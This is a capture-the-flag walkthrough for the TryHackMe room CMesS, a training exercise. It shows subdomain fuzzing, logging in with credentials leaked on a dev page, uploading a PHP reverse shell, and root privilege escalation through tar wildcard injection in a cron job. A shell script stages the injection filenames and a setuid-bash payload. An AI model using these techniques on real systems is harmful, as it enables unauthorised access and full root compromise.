CMesS


https://tryhackme.com/room/cmess

Add <ip> cmess.thm to /etc/hosts

Open Ports:

(screenshot: nmap open ports)

Gaining Access:

Port 80:

  1. Do wfuzz for subdomain (vhost) enumeration
    wfuzz -c -f sub-fighter -w /usr/share/wfuzz/wordlist/top5000 -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm"

    To filter the output (every unknown vhost returns the same default page, 290 words, so hide responses with that word count):

    wfuzz -c -f sub-fighter -w /usr/share/wfuzz/wordlist/top5000 -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" --hw 290

    (screenshot: wfuzz output showing dev.cmess.thm)

  2. Add <ip> dev.cmess.thm to /etc/hosts
    a. The dev page leaks an email address
    b. and a password
  3. Do dirb against http://cmess.thm
    a. Found the /admin page
  4. Log in to the admin panel with those credentials
    a. Go to Content / File / Upload
    b. Upload a PHP reverse shell (start a listener first)
  5. Browse to http://cmess.thm/assets/php-rev to trigger the shell
  6. Upload LinEnum.sh and run it
    a. Found /opt/password.bak
    (screenshot: contents of /opt/password.bak)

User Flag:

(screenshot: user flag)

Privilege Escalation

cat /etc/crontab

(screenshot: /etc/crontab, root backup job running tar with a wildcard)

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/andre/shell.sh
chmod +x /home/andre/shell.sh

Tar-specific filenames (wildcard injection):
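The mechanism behind the cron step, as an added example that is not part of the original writeup: GNU tar accepts options anywhere on the command line, so when a cron job runs `tar -zcf <archive> *` in a directory we can write to, files named `--checkpoint=1` and `--checkpoint-action=exec=sh shell.sh` are expanded by the shell's glob and parsed as options, and tar runs shell.sh with the cron user's privileges. The script below stages those files and plays the cron job's role itself, as the current user, so the whole chain can be checked locally without root. The directory layout, the `tar -zcf <archive> *` invocation and the helper names are assumptions; the room's actual crontab line is not reproduced here.

```shell
#!/bin/sh
# Added example (not from the original writeup): local, unprivileged
# simulation of GNU tar wildcard injection.
# Assumption: the target cron job runs `tar -zcf <archive> *` inside a
# directory the low-privileged user can write to, using GNU tar (busybox
# and BSD tar do not implement --checkpoint-action, so the trick fails there).

# Stage the payload in $1. The payload copies /bin/sh to $2 and sets the
# setuid bit, mirroring the writeup's `cp /bin/bash /tmp/bash; chmod +s /tmp/bash`.
stage_payload() {
    dir="$1"; out="$2"
    mkdir -p "$dir"
    printf 'cp /bin/sh "%s"; chmod +s "%s"\n' "$out" "$out" > "$dir/shell.sh"
    chmod +x "$dir/shell.sh"
    # These two "filenames" become tar options once `*` expands.
    touch "$dir/--checkpoint=1"
    touch "$dir/--checkpoint-action=exec=sh shell.sh"
}

# Play the role of the cron job: cd into the directory and run tar with a
# bare `*`, the exact pattern that makes the injection possible.
run_backup_like_cron() {
    dir="$1"; archive="$2"
    (cd "$dir" && tar -zcf "$archive" *) 2>/dev/null
}

# Prints "triggered" when the payload ran and produced a setuid binary,
# "unsupported" when the local tar is not GNU tar, "not-triggered" otherwise.
demo_tar_wildcard() {
    work=$(mktemp -d)
    stage_payload "$work/backup" "$work/suid_sh"
    if ! tar --version 2>/dev/null | grep -q 'GNU tar'; then
        echo unsupported; rm -rf "$work"; return 0
    fi
    run_backup_like_cron "$work/backup" "$work/backup.tgz"
    if [ -u "$work/suid_sh" ]; then echo triggered; else echo not-triggered; fi
    rm -rf "$work"
}

demo_tar_wildcard
```

In the room the three files must sit in the directory the root cron job tars, not anywhere else, and the payload copies bash rather than sh. Once the job has fired, run `/tmp/bash -p`: without `-p`, bash drops the effective uid back to the real one and the setuid bit buys nothing.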

ROOT Flag:

(screenshot: root flag)